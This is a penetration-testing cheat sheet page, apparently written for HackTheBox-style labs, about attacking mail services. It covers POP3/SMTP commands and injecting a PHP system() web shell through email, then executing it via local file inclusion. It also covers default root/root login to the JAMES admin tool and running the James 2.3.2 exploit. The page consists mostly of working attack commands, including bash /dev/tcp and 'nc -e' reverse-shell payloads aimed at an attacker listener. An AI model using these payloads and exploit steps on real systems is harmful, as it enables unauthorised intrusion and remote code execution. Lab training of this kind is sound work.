Email SMTP

Read emails

telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2

+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah

Send email with telnet

  • SMTP: 25

  • Bonus: Inject a php exploit.. you will need an LFI to read/execute it though

  • REF: PBX-PhpEmailExploit

telnet $IP 25
EHLO beep.htb               ..Any hello will work
VRFY hacked@localhost       ..rejected
VRFY asterisk@localhost     ..Verified
mail from:[email protected]
rcpt to:askerisk@localhost  ..Same as Verified
data                        ..Begin Email
Subject:Testing!

Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.                                            ..to end the email
quit

sendmail with attachment

  • Instead of telnet, EHLO, blah blah...

  • Send a Reverse shell php

> sendmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f [email protected]

execute and connect

  • LFI Execution Example (for after you've sent the evil email)

> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action

.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
                                                                         |
                                                                        Goal

Files

cat /var/mail/askerisk

Thunderbird

  • If you have a user/pass, you can open thunderbird to browser emails

  • You might find a password that you could use for SSH too!! REF: solidstateHTB

thunderbird
create new account: email
mindy@$10.x.x.x
password
read emails

James Server 2.3.2

  • Java Apache Mail Enterprise Server (JAMES)

  • Connect and Reset user-email password

  • Then use Thunderbird email to look for clues

nmap -p- 10.x.x.x
PORT     STATE SERVICE
25/tcp   open  smtp   ..mail server will be present too
110/tcp  open  pop3   ..mail component
119/tcp  open  nntp   ..not sure this is related
4555/tcp open  rsip   ..JAMES connect port for admin tool!!


nc $IP 4555           ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin          ..fail
root:root            ..ok

help
listusers
setpassword admin password
setpassword mindy password  ..will update a user's email password

James Server Exploit 2.3.2 (RCE)

  • 35513 will get you a full-shell

  • Requirements:

    • Default login: root/root

    • Must have a working ssh login user/pass (limited is ok)

    • Need to update the payload for reverse-connect

  • Will add a weird user account: ../../../etc/bash_completion.d

  • Sends email to our 'weird' user-directory

  • When anybody logs into ssh, we will get execution

  • Confused?

    • Yes, you need an ssh login already.. but if its limited it wont do much

    • This will get you a full-shell, instead of a limited

    • Next step is to look for PrivEsc !!

searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'     ..optional

python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

ssh user@server  ..will pop the exploit
nc -nvlp 4444    ..listen
connected        ..with full shell

More

PreviousChar Evasion TricksNextEternal Blue

Last updated

Was this helpful?